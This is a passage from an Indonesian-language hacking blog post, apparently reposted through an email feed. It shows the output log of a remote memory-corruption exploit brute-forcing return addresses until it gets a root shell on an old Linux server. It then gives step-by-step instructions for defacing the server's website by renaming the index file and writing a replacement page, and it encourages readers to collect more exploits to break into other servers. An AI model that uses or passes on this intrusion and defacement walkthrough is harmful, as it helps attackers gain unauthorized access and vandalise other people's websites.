(35) trying: 0xb7f7dd98 slider: 0x0100# SURVIVED #
(36) trying: 0xb7f7dd18 slider: 0x0080# SEGV #
(37) trying: 0xb7f7dd58 slider: 0x0040# SEGV #
(38) trying: 0xb7f7dd78 slider: 0x0020# SURVIVED #
(39) trying: 0xb7f7dd68 slider: 0x0010# SEGV #
(40) trying: 0xb7f7dd70 slider: 0x0008# SEGV #
(41) trying: 0xb7f7dd74 slider: 0x0004# SURVIVED #
(42) trying: 0xb7f7dd72 slider: 0x0002# SEGV #
Final stack_dist: 0xb7f7dd74
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfa

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcf6

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
Crash, finding next return address
Changing MSW of return address to: 0x080a
Crash, finding next return address
EX: buf: 0x080835ec h: 0x0807d000 ret-dist: 0xb7f7dcfc

ATTACH NOW
Changing MSW of return address to: 0x0808
Crash, finding next return address
Changing MSW of return address to: 0x0809
No Crash, might have worked
Reply from remote: CHRIS CHRIS

***** YOU ARE IN *****

localhost.localdomain

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686
unknown

uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

.....HOREEEEE...dapat root heheehehhe, nah sekarang loe udah mendapatkan fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya halaman index pada server UNIX ditempatkan pada direktori tertentu, yaitu : home/html atau home/html/httpd atau bisa juga di direktori var/html atau var/html/httpd
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu...untuk meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama dari file halaman index situs itu..hmmm biasanya sich index.html atau index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo deh...gampang kan??? heheheh..cuman kalo gue rada malas sich make echo mending bikin halaman baru...;)), gini caranya :
  1. ganti dulu nama indexnyamv index.htm oldindex.htm
  2. sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm
  3. masukan HTML yang kalian buat di vi ataupun pico tadi
  4. buka browser kalian....heheeheh..udah ganti kan sekrang halamannya.. SiiiPPPP..!!
Gitu aja kok caranya...mudah aja kan..?? hehehhe...intinya memang cuman bagaimana mendapatkan fasilitas root pada server, dan seperti yang telah gue bilang tadi bahwa setiap server memiliki karakteristik yang berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit yang berbeda apabila kita ingin mencoba menembus server yang memiliki OS yang berbeda pula...so many exploit out thare...just get iT..!!
source : http://dekate.blogspot.com 


   
     
 
This email was sent to windows.windowxp.xp@gmail.com.
Delivered by Feed My Inbox
PO Box 682532 Franklin, TN 37068
Account Login
Unsubscribe Here Feed My Inbox
 
     

0 komentar:

Posting Komentar

Dimohon Komentarnya...
1 Komentar Anda Sangat Berarti Untuk Blog Saya...

Home |Privacy Policy |2011 copyright SAKAXP Themes By KHENDIN edited by SakaXP